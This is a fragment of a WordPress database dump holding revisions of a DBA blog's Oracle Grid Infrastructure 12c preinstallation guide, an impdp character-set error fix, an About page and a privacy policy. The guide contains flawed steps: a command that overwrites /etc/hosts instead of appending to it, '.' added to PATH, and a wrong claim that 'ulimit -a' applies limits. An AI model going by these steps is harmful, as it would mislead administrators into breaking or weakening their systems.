grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\npasswd oracle\npasswd grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></pre>\n<!-- /wp:code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></pre>\n<!-- /wp:code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></pre>\n<!-- /wp:code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nulimit -a \n</code></pre>\n<!-- /wp:code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n</code></pre>\n<!-- /wp:code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></pre>\n<!-- /wp:code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></pre>\n<!-- /wp:code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /home/grid/.bash_profile\n</code></pre>\n<!-- /wp:code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></pre>\n<!-- /wp:code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></pre>\n<!-- /wp:code -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:15:48','2020-02-02 10:15:48','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(49,2,'2020-02-02 10:16:28','2020-02-02 10:16:28','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code></pre>\n<!-- /wp:code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nfree -b\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n</code></pre>\n<!-- /wp:code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsysctl -p\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\npasswd oracle\npasswd grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></pre>\n<!-- /wp:code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></pre>\n<!-- /wp:code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></pre>\n<!-- /wp:code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nulimit -a \n</code></pre>\n<!-- /wp:code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n</code></pre>\n<!-- /wp:code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></pre>\n<!-- /wp:code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></pre>\n<!-- /wp:code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /home/grid/.bash_profile\n</code></pre>\n<!-- /wp:code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></pre>\n<!-- /wp:code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></pre>\n<!-- /wp:code -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:16:28','2020-02-02 10:16:28','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(50,2,'2020-02-02 10:21:39','2020-02-02 10:21:39','<!-- wp:paragraph -->\n<p>Hi. Welcome to my blog.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My name is Masoud. I\'m a DBA and I am goint to share my experiences here with others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Feel free to contact me and tell me your opinions.</p>\n<!-- /wp:paragraph -->','Sample Page','','inherit','closed','closed','','2-revision-v1','','','2020-02-02 10:21:39','2020-02-02 10:21:39','',2,'http://ictbank.ir/blog/index.php/2020/02/02/2-revision-v1/',0,'revision','',0),
(51,2,'2020-02-02 10:24:14','2020-02-02 10:24:14','<!-- wp:paragraph -->\n<p>Hi. Welcome to my blog.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My name is Masoud. I\'m a DBA and I am goint to share my experiences here with others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Feel free to contact me and tell me your opinions.</p>\n<!-- /wp:paragraph -->','About Me','','publish','closed','closed','','about-me','','','2020-02-02 10:24:14','2020-02-02 10:24:14','',0,'http://ictbank.ir/blog/?page_id=51',0,'page','',0),
(52,2,'2020-02-02 10:24:14','2020-02-02 10:24:14','<!-- wp:paragraph -->\n<p>Hi. Welcome to my blog.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My name is Masoud. I\'m a DBA and I am goint to share my experiences here with others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Feel free to contact me and tell me your opinions.</p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2020-02-02 10:24:14','2020-02-02 10:24:14','',51,'http://ictbank.ir/blog/index.php/2020/02/02/51-revision-v1/',0,'revision','',0),
(53,2,'2020-02-02 10:24:35','2020-02-02 10:24:35','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Our website address is: http://ictbank.ir/blog.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What personal data we collect and why we collect it</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Comments</h3><!-- /wp:heading --><!-- wp:paragraph --><p>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Media</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Contact forms</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Cookies</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Embedded content from other websites</h3><!-- /wp:heading --><!-- wp:paragraph --><p>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Analytics</h3><!-- /wp:heading --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Your contact information</h2><!-- /wp:heading --><!-- wp:heading --><h2>Additional information</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>How we protect your data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What data breach procedures we have in place</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What third parties we receive data from</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What automated decision making and/or profiling we do with user data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Industry regulatory disclosure requirements</h3><!-- /wp:heading -->','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2020-02-02 10:24:35','2020-02-02 10:24:35','',3,'http://ictbank.ir/blog/index.php/2020/02/02/3-revision-v1/',0,'revision','',0),
(54,1,'2020-02-02 12:07:50','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-02-02 12:07:50','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=54',0,'post','',0),
(56,2,'2020-02-02 12:16:02','2020-02-02 12:16:02','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\"\nORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></code></pre>\n<!-- /wp:code -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype: </code></pre>\n<!-- /wp:code -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT; </code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></code></pre>\n<!-- /wp:code -->','IMPDP Errors: ORA-02374, ORA-12899','','publish','open','open','','impdp-errors-ora-02374-ora-12899','','','2020-02-02 12:42:56','2020-02-02 12:42:56','',0,'http://ictbank.ir/blog/?p=56',0,'post','',0),
(57,2,'2020-02-02 12:16:02','2020-02-02 12:16:02','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\"\nORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></code></pre>\n<!-- /wp:code -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype: </code></pre>\n<!-- /wp:code -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT; </code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></code></pre>\n<!-- /wp:code -->','IMPDP Errors: ORA-02374, ORA-12899','','inherit','closed','closed','','56-revision-v1','','','2020-02-02 12:16:02','2020-02-02 12:16:02','',56,'http://ictbank.ir/blog/index.php/2020/02/02/56-revision-v1/',0,'revision','',0),
(58,2,'2020-02-02 12:16:30','2020-02-02 12:16:30','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\"\nORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></code></pre>\n<!-- /wp:code -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype: </code></pre>\n<!-- /wp:code -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT 